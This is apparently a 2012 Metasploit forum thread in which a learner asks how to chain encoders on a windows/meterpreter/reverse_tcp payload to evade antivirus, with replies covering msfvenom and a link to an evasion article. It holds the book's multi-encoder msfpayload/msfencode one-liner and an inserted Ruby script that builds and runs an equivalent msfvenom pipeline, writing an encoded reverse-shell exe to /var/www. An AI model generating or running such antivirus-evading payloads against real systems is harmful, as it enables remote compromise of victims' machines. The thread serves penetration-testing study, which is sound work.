3 Replies Latest reply on Feb 17, 2012 12:26 PM by zeknox

    generating payload

      Hi guys,

      I am new to Metasploit and I am trying to learn this amazing tool. I am reading a book on it and I'm at a part where it talks about encoding payloads to avoid antivirus software. I am kind of confused whether I HAVE to use msfcli to perform multiple encodings or if I can just use msfconsole. I prefer using msfconsole right now because I can press Tab to get suggestions when typing paths and such. This is what I'm doing to encode the payload:


      msf > use payload/windows/shell/reverse_tcp
      msf > set LHOST .... and set LPORT ...
      msf > generate -f payload.exe -t exe -e x86/shikata_ga_nai


      The book uses the following command for multi-encoding:

      root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe


      The book uses version 3.7 of Metasploit and I'm using version 4.2.



      1. Is the generate command in msfconsole equivalent to msfpayload/msfencode in msfcli?

      2. How do I write the command used by the book for multiple encodings (shown above) using the generate command in msfconsole? I could only figure out using the -e switch with the generate command in msfconsole, which is good for only one encoding. How can I use multiple encodings?

      3. Where do I find the path used by the use command (shown above), payload/windows/shell/reverse_tcp? I checked my local directory structure and I only see /opt/framework/msf3/modules/payloads/stagers/windows/reverse_tcp.rb. I am not sure how reverse_tcp is being loaded even though the path to reverse_tcp is completely different.


      Any help would be greatly appreciated.


      Thanks in advance.
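      The mapping behind the third question, as an added example that is not part of the original post and not Metasploit's own code: a small Ruby script that applies the naming rule the framework uses for payload reference names. Single payloads map one-to-one onto a file under modules/payloads/singles. A staged payload such as windows/shell/reverse_tcp has no file of its own; it is composed at load time from the stage (modules/payloads/stages/windows/shell.rb) and the stager (modules/payloads/stagers/windows/reverse_tcp.rb), and exposed under the combined name directory/stage/stager. The script builds a constructed miniature of that tree in a temporary directory (the file contents are placeholders) and resolves names against it; it composes purely by directory, whereas the real framework additionally filters stage/stager pairs by architecture and platform compatibility.

```ruby
# Added example (not from the forum thread or from Metasploit): reproduce the
# payload naming rule to show why "windows/shell/reverse_tcp" has no file.
#   singles : modules/payloads/singles/<dir>/<name>.rb    -> <dir>/<name>
#   staged  : modules/payloads/stages/<dir>/<stage>.rb
#           + modules/payloads/stagers/<dir>/<stager>.rb  -> <dir>/<stage>/<stager>
# The real framework also checks stage/stager compatibility (arch, platform);
# this toy composes by directory only, which is enough to show the mapping.
require 'tmpdir'
require 'fileutils'

# Split a staged refname into [dir, stage, stager], e.g.
# "windows/x64/meterpreter/reverse_tcp" -> ["windows/x64", "meterpreter", "reverse_tcp"]
def split_staged_name(refname)
  parts = refname.split('/')
  return nil if parts.length < 3
  [parts[0..-3].join('/'), parts[-2], parts[-1]]
end

# Resolve a refname against a modules/payloads tree. Returns a hash with
# :kind (:single or :staged) and :files, or nil when nothing matches.
def resolve_payload(payloads_root, refname)
  single = File.join(payloads_root, 'singles', "#{refname}.rb")
  return { kind: :single, files: [single] } if File.file?(single)

  dir, stage, stager = split_staged_name(refname)
  return nil if dir.nil?
  stage_file  = File.join(payloads_root, 'stages',  dir, "#{stage}.rb")
  stager_file = File.join(payloads_root, 'stagers', dir, "#{stager}.rb")
  return nil unless File.file?(stage_file) && File.file?(stager_file)
  { kind: :staged, files: [stager_file, stage_file] }
end

# Enumerate every staged name the tree can produce: in each directory that
# holds both stages and stagers, every stage is paired with every stager.
def staged_names(payloads_root)
  stages_root = File.join(payloads_root, 'stages')
  names = Dir.glob(File.join(stages_root, '**', '*.rb')).map do |stage_file|
    rel = stage_file.sub("#{stages_root}/", '').sub(/\.rb\z/, '')
    dir = File.dirname(rel)
    Dir.glob(File.join(payloads_root, 'stagers', dir, '*.rb')).map do |stager_file|
      "#{dir}/#{File.basename(rel)}/#{File.basename(stager_file, '.rb')}"
    end
  end
  names.flatten.sort
end

# Constructed miniature of the real layout; contents are irrelevant here.
MOCK_FILES = %w[
  singles/windows/shell_reverse_tcp.rb
  stagers/windows/reverse_tcp.rb
  stagers/windows/bind_tcp.rb
  stages/windows/shell.rb
  stages/windows/meterpreter.rb
  stagers/windows/x64/reverse_tcp.rb
  stages/windows/x64/meterpreter.rb
].freeze

def build_mock_tree(root)
  MOCK_FILES.each do |rel|
    path = File.join(root, rel)
    FileUtils.mkdir_p(File.dirname(path))
    File.write(path, "# placeholder module\n")
  end
  root
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |root|
    build_mock_tree(root)
    puts staged_names(root)
    p resolve_payload(root, 'windows/shell/reverse_tcp')
    p resolve_payload(root, 'windows/shell_reverse_tcp')
  end
end
```

      Run it and the listing shows four windows/.../... names produced from two stages and two stagers, plus windows/x64/meterpreter/reverse_tcp from the x64 directory, which is why the stager file the question found (stagers/windows/reverse_tcp.rb) serves several payload names at once.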

        • Re: generating payload

          You can't use msfpayload and msfencode in msfconsole. You have the following options:


          1. Use msfcli in combination with msfpayload and msfencode, like you already did and as published in the book.


          2. Use msfvenom


          Usage: /opt/framework/msf3/msfvenom [options] <var=val>

              -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
              -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
              -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
              -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, bash, sh, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
              -e, --encoder    [encoder]       The encoder to use
              -a, --arch       [architecture]  The architecture to use
                  --platform   [platform]      The platform of the payload
              -s, --space      [length]        The maximum size of the resulting payload
              -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'
              -i, --iterations [count]         The number of times to encode the payload
              -c, --add-code   [path]          Specify an additional win32 shellcode file to include
              -x, --template   [path]          Specify a custom executable file to use as a template
              -k, --keep                       Preserve the template behavior and inject the payload as a new thread
              -h, --help                       Show this message
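          How the book's msfencode chain looks when driven through msfvenom, as an added example that is not part of this reply and not Metasploit's own code. It uses only the options in the usage text above: -i repeats a single encoder, and there is no flag that chains several different encoders, so each further encoder is applied by piping raw output into another msfvenom started with `-p -` (custom payload on stdin). Because a raw blob on stdin carries no module metadata, every stage after the first is given -a and --platform explicitly; the script assumes an x86 Windows target. The LHOST value 192.0.2.10 is a placeholder from the documentation range, since the book's line leaves it blank; the output path is the one the book uses. When msfvenom is on PATH the pipeline is actually executed via Ruby's Open3.pipeline, otherwise only the equivalent shell one-liner is printed.

```ruby
# Added example (not from the thread or from Metasploit): build the msfvenom
# equivalent of "msfpayload ... R | msfencode -c N | msfencode ..." as a
# pipeline of msfvenom processes, one per encoder, joined with "-p -".
require 'open3'

PAYLOAD = 'windows/meterpreter/reverse_tcp'

# The book's encoder chain as [encoder, iterations] pairs, in order.
BOOK_CHAIN = [
  ['x86/shikata_ga_nai', 5],
  ['x86/alpha_upper',    2],
  ['x86/shikata_ga_nai', 5],
  ['x86/countdown',      5],
].freeze

# Build one argv array per pipeline stage. Every stage but the last emits
# raw bytes (-f raw); the last writes the final exe to out_file.
# Stages after the first read the previous stage's bytes from stdin (-p -)
# and therefore need -a/--platform to pick a compatible encoder.
def build_chain(payload, payload_opts, chain, out_file, arch: 'x86', platform: 'windows')
  chain.each_with_index.map do |(encoder, iterations), idx|
    first = idx.zero?
    last  = idx == chain.length - 1
    argv  = ['msfvenom']
    argv += first ? ['-p', payload, *payload_opts] : ['-p', '-', '-a', arch, '--platform', platform]
    argv += ['-e', encoder, '-i', iterations.to_s]
    argv += last ? ['-f', 'exe', '-o', out_file] : ['-f', 'raw']
    argv
  end
end

# Render the argv arrays as the one-liner a user would type in a shell.
def chain_to_shell(cmds)
  cmds.map { |argv| argv.join(' ') }.join(' | ')
end

# Execute the pipeline; returns the per-process exit statuses, or nil when
# msfvenom is not installed so the script stays harmless elsewhere.
def msfvenom_available?
  ENV.fetch('PATH', '').split(File::PATH_SEPARATOR)
     .any? { |d| File.executable?(File.join(d, 'msfvenom')) }
end

def run_chain(cmds)
  return nil unless msfvenom_available?
  Open3.pipeline(*cmds)
end

if __FILE__ == $PROGRAM_NAME
  # 192.0.2.10 is a placeholder address (assumption); the book's line leaves LHOST blank.
  cmds = build_chain(PAYLOAD, ['LHOST=192.0.2.10', 'LPORT=31337'], BOOK_CHAIN, '/var/www/payload3.exe')
  puts chain_to_shell(cmds)
  statuses = run_chain(cmds)
  puts(statuses ? statuses.map(&:exitstatus).inspect : 'msfvenom not on PATH; command printed only')
end
```

          Each stage's exit status is returned separately by Open3.pipeline, so a failing encoder in the middle of the chain (for example one that cannot find a suitable key within the size limit) is visible rather than silently producing an empty exe. The encoder names available on a given install can be listed with the -l option shown above (`msfvenom -l encoders`).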

          • Re: generating payload

            I wanted to post an article that I feel is relevant to evading Antivirus with metasploit payloads.  This method offers alot of flexibility to the penetration testers to obfuscate the ASM instructions however they chose.  For more information see this blog article here:


            http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection- ghost-writing-asm/


            Let me know your thoughts!